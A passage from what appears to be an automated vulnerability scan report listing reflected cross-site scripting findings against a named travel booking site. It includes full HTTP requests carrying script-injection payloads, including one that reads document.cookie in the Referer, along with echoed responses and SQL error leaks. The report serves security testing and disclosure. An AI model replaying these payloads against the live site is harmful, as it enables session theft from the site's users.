User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3051


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script>

function autoload() {
   if(document.forms[0]) {
document.forms[0].submit();
}
   else {
       window.location = "booking_results.php?cloneID=41&group_id=982&rooms=14bf0d"-alert(1)-"37c3df7008b&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29";
   
   }
}

</script>
...[SNIP]...

2.35. http://parkcitytrips.com/redirect_booking.php [sDay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the sDay request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afc8a"-alert(1)-"883d0ba6550 was submitted in the sDay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26afc8a"-alert(1)-"883d0ba6550&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3051


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script>

function autoload() {
   if(document.forms[0]) {
document.forms[0].submit();
}
   else {
       window.location = "booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26afc8a"-alert(1)-"883d0ba6550&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29";
   
   }
}

</script>
...[SNIP]...

2.36. http://parkcitytrips.com/redirect_booking.php [sDay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the sDay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50145"><script>alert(1)</script>8609c76a0fb was submitted in the sDay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=2650145"><script>alert(1)</script>8609c76a0fb&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3096


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=2650145"><script>alert(1)</script>8609c76a0fb&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29">
...[SNIP]...

2.37. http://parkcitytrips.com/redirect_booking.php [sMonth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the sMonth request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2142f"><script>alert(1)</script>000cb437d59 was submitted in the sMonth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=102142f"><script>alert(1)</script>000cb437d59&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3096


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=102142f"><script>alert(1)</script>000cb437d59&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29">
...[SNIP]...

2.38. http://parkcitytrips.com/redirect_booking.php [sMonth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the sMonth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4560"-alert(1)-"addd76b74f6 was submitted in the sMonth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10d4560"-alert(1)-"addd76b74f6&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3051


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
t>

function autoload() {
   if(document.forms[0]) {
document.forms[0].submit();
}
   else {
       window.location = "booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10d4560"-alert(1)-"addd76b74f6&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29";
   
   }
}

</script>
...[SNIP]...

2.39. http://parkcitytrips.com/redirect_booking.php [sYear parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the sYear request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37b4e"><script>alert(1)</script>337a9019c38 was submitted in the sYear parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=201037b4e"><script>alert(1)</script>337a9019c38&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3096


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=201037b4e"><script>alert(1)</script>337a9019c38&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29">
...[SNIP]...

2.40. http://parkcitytrips.com/redirect_booking.php [sYear parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the sYear request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66ace"-alert(1)-"bdcab98485f was submitted in the sYear parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=201066ace"-alert(1)-"bdcab98485f&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3051


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
n autoload() {
   if(document.forms[0]) {
document.forms[0].submit();
}
   else {
       window.location = "booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=201066ace"-alert(1)-"bdcab98485f&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29";
   
   }
}

</script>
...[SNIP]...

2.41. http://parkcitytrips.com/redirect_booking.php [start-date parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the start-date request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 445a7"><script>alert(1)</script>c96235d81c7 was submitted in the start-date parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011445a7"><script>alert(1)</script>c96235d81c7&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3096


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011445a7"><script>alert(1)</script>c96235d81c7&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29">
...[SNIP]...

2.42. http://parkcitytrips.com/redirect_booking.php [start-date parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the start-date request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e96d0"-alert(1)-"ed380151cb was submitted in the start-date parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011e96d0"-alert(1)-"ed380151cb&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3048


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
t.forms[0]) {
document.forms[0].submit();
}
   else {
       window.location = "booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011e96d0"-alert(1)-"ed380151cb&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29";
   
   }
}

</script>
...[SNIP]...

2.43. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php [cloneID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/price_calendar_wrapper.php

Issue detail

The value of the cloneID request parameter is copied into the HTML document as plain text between tags. The payload a8154<script>alert(1)</script>7764ec00d39 was submitted in the cloneID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v002/dbase/php_ajax/price_calendar_wrapper.php?sitename=parkcitytrips_com&eventID=1436&sDate=10/26/2010&eDate=10/29/2010&cloneID=41a8154<script>alert(1)</script>7764ec00d39 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:57:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 334
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>SELECT template_path,template_style FROM clones WHERE id = 41a8154<script>alert(1)</script>7764ec00d39</i> You have an error in your SQL s
...[SNIP]...

2.44. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php [eDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/price_calendar_wrapper.php

Issue detail

The value of the eDate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ea79'%3balert(1)//6bab4578d5 was submitted in the eDate parameter. This input was echoed as 2ea79';alert(1)//6bab4578d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v002/dbase/php_ajax/price_calendar_wrapper.php?sitename=parkcitytrips_com&eventID=1436&sDate=10/26/2010&eDate=10/29/20102ea79'%3balert(1)//6bab4578d5&cloneID=41 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:53:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4950
Content-Type: text/html; charset=UTF-8
Connection: close

<div style="position:fixed;top:0px;left:0px;height:100%;width:100%;background:url(/images/trans_overlay.png) repeat;z-index:1;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Rate Calendar','Click'
...[SNIP]...
e if(eImgSrc) $('#calEventImg').attr('src',eImgSrc);

$('iframe#calFrame').attr('src','/v002/dbase/php_ajax/price_calendar.php?sitename=parkcitytrips_com&event_id=1436&sDate=10/26/2010&eDate=10/29/20102ea79';alert(1)//6bab4578d5&css=parkcityinfo-calendar.css');
$('iframe#calFrame').load(function(){
   $('#loadingW').hide();
   $('#calOverlay').show();
   
   try{
       var innerSDate = window.frames[0].document.getElementById('sDate').va
...[SNIP]...

2.45. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php [eventID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/price_calendar_wrapper.php

Issue detail

The value of the eventID request parameter is copied into the HTML document as plain text between tags. The payload fd8a9<script>alert(1)</script>08b2e3144a8 was submitted in the eventID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v002/dbase/php_ajax/price_calendar_wrapper.php?sitename=parkcitytrips_com&eventID=1436fd8a9<script>alert(1)</script>08b2e3144a8&sDate=10/26/2010&eDate=10/29/2010&cloneID=41 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:49:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 325
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>SELECT geolocationString FROM events WHERE id = 1436fd8a9<script>alert(1)</script>08b2e3144a8</i> You have an error in your SQL syntax; ch
...[SNIP]...

2.46. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php [sDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/price_calendar_wrapper.php

Issue detail

The value of the sDate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cead2'%3balert(1)//b16508184ac was submitted in the sDate parameter. This input was echoed as cead2';alert(1)//b16508184ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v002/dbase/php_ajax/price_calendar_wrapper.php?sitename=parkcitytrips_com&eventID=1436&sDate=10/26/2010cead2'%3balert(1)//b16508184ac&eDate=10/29/2010&cloneID=41 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:51:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4951
Content-Type: text/html; charset=UTF-8
Connection: close

<div style="position:fixed;top:0px;left:0px;height:100%;width:100%;background:url(/images/trans_overlay.png) repeat;z-index:1;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Rate Calendar','Click'
...[SNIP]...
Img').hide();
else if(eImgSrc) $('#calEventImg').attr('src',eImgSrc);

$('iframe#calFrame').attr('src','/v002/dbase/php_ajax/price_calendar.php?sitename=parkcitytrips_com&event_id=1436&sDate=10/26/2010cead2';alert(1)//b16508184ac&eDate=10/29/2010&css=parkcityinfo-calendar.css');
$('iframe#calFrame').load(function(){
   $('#loadingW').hide();
   $('#calOverlay').show();
   
   try{
       var innerSDate = window.frames[0].document.getElemen
...[SNIP]...

2.47. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php [sitename parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/price_calendar_wrapper.php

Issue detail

The value of the sitename request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3134'%3balert(1)//b2adc22b41e was submitted in the sitename parameter. This input was echoed as d3134';alert(1)//b2adc22b41e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

